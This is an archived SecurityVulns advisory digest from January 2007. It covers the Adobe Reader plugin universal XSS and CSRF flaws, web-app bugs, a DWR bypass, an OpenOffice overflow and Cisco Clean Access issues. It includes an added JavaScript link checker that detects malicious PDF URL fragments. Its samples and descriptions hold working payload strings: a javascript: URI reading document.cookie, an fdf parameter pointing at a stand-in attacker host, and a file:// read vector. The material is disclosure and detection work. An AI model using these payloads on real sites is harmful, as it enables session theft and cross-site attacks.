Computer Security


Adobe Reader plugin: universal cross-site scripting via PDF files
updated since 03.01.2007
Published:04.01.2007
Source:
SecurityVulns ID:6994
Type:client
Threat Level: 7/10
Description:1. A URI of the form http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here makes the plugin run the JavaScript in the context (origin) of the site hosting the PDF. The parameter name is arbitrary, so any web site that serves at least one PDF file is affected. 2. A "trigger action" embedded in a PDF document can likewise execute code in the context of the web page where the document is stored. Further bugs are exploitable through a web page (see the CVE entries below).
Affected:ADOBE : Acrobat Reader 6.0
 ADOBE : Acrobat Reader 7.0
CVE:CVE-2007-1199 (Adobe Reader and Acrobat Trial allow remote attackers to read arbitrary files via a file:// URI in a PDF document, as demonstrated with <</URI(file:///C:/)/S/URI>>, a different issue than CVE-2007-0045.)
 CVE-2007-0048 (Adobe Acrobat Reader Plugin before 8.0.0, when used with Internet Explorer, allows remote attackers to cause a denial of service (memory consumption) via a long sequence of # (hash) characters appended to a PDF URL.)
 CVE-2007-0047 (CRLF injection vulnerability in Adobe Acrobat Reader Plugin before 8.0.0, when used with the Microsoft.XMLHTTP ActiveX object in Internet Explorer, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the javascript: URI in the (1) FDF, (2) XML, or (3) XFDF AJAX request parameters.)
 CVE-2007-0046 (Double free vulnerability in the Adobe Acrobat Reader Plugin before 8.0.0, as used in Mozilla Firefox 1.5.0.7, allows remote attackers to execute arbitrary code by causing an error via a javascript: URI call to document.write in the (1) FDF, (2) XML, or (3) XFDF AJAX request parameters.)
 CVE-2007-0045 (Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0 for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS).")
 CVE-2007-0044 (Adobe Acrobat Reader Plugin before 8.0.0 for the Firefox, Internet Explorer, and Opera web browsers allows remote attackers to force the browser to make unauthorized requests to other web sites via a URL in the (1) FDF, (2) xml, and (3) xfdf AJAX request parameters, following the # (hash) character, aka "Universal CSRF and session riding.")
Original documents: Stefano Di Paola, Adobe Acrobat Reader Plugin - Multiple Vulnerabilities (04.01.2007)
 Maximize Designs, Re: Unpatchable Quicktime XSS (03.01.2007)
 pdp (architect), [Full-disclosure] Universal XSS with PDF files: highly dangerous (03.01.2007)
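The following is an added example, not code from the advisory or from Adobe. It classifies links to PDF files by the Acrobat "open parameters" carried in the URL fragment, the vector described above and in CVE-2007-0045 (any parameter name with a javascript: or res: value), CVE-2007-0044 (fdf/xml/xfdf parameters that make the plugin fetch another site) and CVE-2007-0048 (a long run of # characters). The hostnames, sample URLs and the hash-run threshold are constructed for illustration.

```javascript
// Added example (not from the advisory or Adobe): classify a link to a PDF by the
// Acrobat open parameters in its fragment. Sample URLs, hostnames and the
// threshold below are constructed.

const UXSS_SCHEME = /^\s*(?:javascript|res)\s*:/i;     // schemes abused per CVE-2007-0045
const FETCH_PARAMS = new Set(['fdf', 'xml', 'xfdf']);   // params the plugin fetches, CVE-2007-0044
const MAX_HASH_RUN = 64;                                 // constructed threshold for CVE-2007-0048

// Split "name=value&name2=value2" (the Acrobat open-parameter syntax) into pairs.
function parseOpenParams(fragment) {
  const params = [];
  for (const piece of fragment.split('&')) {
    if (!piece) continue;
    const eq = piece.indexOf('=');
    const name = (eq < 0 ? piece : piece.slice(0, eq)).toLowerCase();
    let value = eq < 0 ? '' : piece.slice(eq + 1);
    try { value = decodeURIComponent(value); } catch (_) { /* keep raw value on bad escapes */ }
    params.push({ name, value });
  }
  return params;
}

// Return { pdf, findings } for a link as the browser would hand it to the plugin.
function classifyPdfLink(href, base) {
  const url = new URL(href, base);
  if (!/\.pdf$/i.test(url.pathname)) return { pdf: false, findings: [] };

  const findings = [];
  // url.hash keeps the leading '#'; count every '#' for the flood case.
  const hashRun = (url.hash.match(/#/g) || []).length;
  if (hashRun > MAX_HASH_RUN) findings.push({ kind: 'hash-flood', count: hashRun });

  for (const { name, value } of parseOpenParams(url.hash.slice(1))) {
    // The vulnerable plugin evaluated a javascript:/res: value in the origin of the
    // site hosting the PDF, whatever the parameter name was.
    if (UXSS_SCHEME.test(value)) findings.push({ kind: 'uxss', name, value });

    // fdf/xml/xfdf made the plugin request the given URL with the victim's cookies.
    if (FETCH_PARAMS.has(name)) {
      let target = null;
      try { target = new URL(value, url); } catch (_) { /* unparsable, ignore */ }
      if (target && target.origin !== url.origin) {
        findings.push({ kind: 'cross-site-fetch', name, value: target.href });
      }
    }
  }
  return { pdf: true, findings };
}

// Constructed samples: what a link checker running on victim.example would see.
const SAMPLES = [
  'http://victim.example/docs/report.pdf#page=3&zoom=100',
  'http://victim.example/docs/report.pdf#whatever_name_you_want=javascript:alert(document.cookie)',
  'http://victim.example/docs/report.pdf#fdf=http://attacker.example/steal.fdf',
  'http://victim.example/docs/report.pdf' + '#'.repeat(200),
];

function auditSamples() {
  return SAMPLES.map((href) => classifyPdfLink(href, 'http://victim.example/'));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [i, r] of auditSamples().entries()) console.log(SAMPLES[i], r.findings);
}
```

Note the caveat this check makes visible: everything after # is never sent to the server, so server-side URL filtering and access logs cannot see the payload; the fix is on the client (the plugin version the CVEs name as fixed, 8.0.0) or in not letting the browser hand PDFs to the inline plugin at all, for example by serving them with Content-Disposition: attachment.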

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:04.01.2007
Source:
SecurityVulns ID:6995
Type:remote
Threat Level: 5/10
Description:PHP file inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected:OPENPINBOARD : OpenPinboard 2.0
CVE:CVE-2007-0093 (SQL injection vulnerability in page.php in Simple Web Content Management System allows remote attackers to execute arbitrary SQL commands via the id parameter.)
 CVE-2007-0090 (WineGlass stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/data.mdb.)
 CVE-2007-0089 (jgbbs stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/bbs.mdb.)
 CVE-2007-0088 (Multiple directory traversal vulnerabilities in openmedia allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) src parameter to page.php or the (2) format parameter to search_form.php.)
 CVE-2007-0050 (** DISPUTED ** PHP remote file inclusion vulnerability in index.php in OpenPinboard 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the language parameter. NOTE: this issue has been disputed by the developer and a third party, since the variable is set before use. CVE analysis suggests that there is a small time window of risk before the installation is complete.)
Original documents: dr.t3rr0r1st_(at)_yahoo.com, jgbbs (04.01.2007)
 zooz_998_(at)_hotmail.com, OpenPinboard <= Remote File Include (04.01.2007)
 Advisory_(at)_Aria-Security.net, WineGlass "data.mdb" Remote Password Disclosure (04.01.2007)
 exe_crack_(at)_hotmail.com, openmedia local read file (04.01.2007)
Files:Simple Web Content Management System SQL Injection Exploit

DWR protection bypass
Published:04.01.2007
Source:
SecurityVulns ID:6996
Type:remote
Threat Level: 5/10
Description:Restrictions on which server-side functions may be called are enforced only on the client side, so a client that talks to the DWR endpoint directly can bypass them.
Affected:GETAHEAD : DWR 1.1
Original document: Amichai Shulman, Hacking AJAX DWR Applications (04.01.2007)

OpenOffice buffer overflow
Published:04.01.2007
Source:
SecurityVulns ID:6998
Type:remote
Threat Level: 6/10
Description:An integer overflow during parsing of EMF/WMF image files leads to a heap buffer overflow.
Affected:OPENOFFICE : OpenOffice 1.1
 OPENOFFICE : OpenOffice 2.0
 OPENOFFICE : OpenOffice 2.1
Original documents: NGSSoftware Insight Security Research, [VulnWatch] High Risk Vulnerability in the OpenOffice and StarOffice Suites (04.01.2007)
 REDHAT, openoffice.org security update (04.01.2007)

Multiple Cisco Clean Access vulnerabilities
updated since 04.01.2007
Published:09.01.2007
Source:
SecurityVulns ID:6997
Type:remote
Threat Level: 7/10
Description:The shared secret used for client access is the same on all devices and cannot be changed. The location of a database backup (snapshot) can be brute-forced and the file downloaded without authentication.
Affected:CISCO : Cisco Clean Access 3.5
 CISCO : Cisco Clean Access 3.6
 CISCO : Cisco Clean Access 4.0
CVE:CVE-2007-0058 (Cisco Clean Access (CCA) 3.5.x through 3.5.9 and 3.6.x through 3.6.1.1 on the Clean Access Manager (CAM) allows remote attackers to bypass authentication and download arbitrary manual database backups by guessing the snapshot filename using brute force, then making a direct request for the file.)
 CVE-2007-0057 (Cisco Clean Access (CCA) 3.6.x through 3.6.4.2 and 4.0.x through 4.0.3.2 does not properly configure or allow modification of a shared secret authentication key, which causes all devices to have the same shared secret and allows remote attackers to gain unauthorized access.)
Original documents: Damir Rajnovic, Re: [Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Clean Access (09.01.2007)
 CISCO, Cisco Security Advisory: Multiple Vulnerabilities in Cisco Clean Access (04.01.2007)

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod